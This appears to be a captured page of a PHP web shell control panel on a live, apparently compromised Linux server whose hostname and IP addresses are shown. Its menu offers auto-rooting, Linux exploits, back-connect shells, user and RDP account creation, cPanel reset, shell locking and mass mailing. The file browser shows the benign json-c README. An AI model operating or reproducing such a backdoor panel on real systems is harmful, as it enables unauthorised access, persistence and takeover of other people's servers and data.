Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els11.x86_64 #1 SMP Sun Nov 3 09:06:59 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.222.20.250
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
json-c-0.11 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
165
B
-rw-r--r--
COPYING
2.15
KB
-rw-r--r--
ChangeLog
8.26
KB
-rw-r--r--
NEWS
0
B
-rw-r--r--
README
949
B
-rw-r--r--
README.html
1.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
Building on Unix with git, gcc and autotools Home page for json-c: https://github.com/json-c/json-c/wiki Caution: do NOT use sources from svn.metaparadigm.com, they are old. Prerequisites: gcc (or another C compiler) libtool If you're not using a release tarball, you'll also need: autoconf (autoreconf) automake Github repo for json-c: https://github.com/json-c/json-c $ git clone https://github.com/json-c/json-c.git $ cd json-c $ sh autogen.sh Then $ ./configure $ make $ make install To build and run the test programs run $ make check Linking to libjson-c If your system has pkgconfig then you can just add this to your makefile CFLAGS += $(shell pkg-config --cflags json-c) LDFLAGS += $(shell pkg-config --libs json-c) Without pkgconfig, you would do something like this: JSON_C_DIR=/path/to/json_c/install CFLAGS += -I$(JSON_C_DIR)/include/json-c LDFLAGS+= -L$(JSON_C_DIR)/lib -ljson-c
Close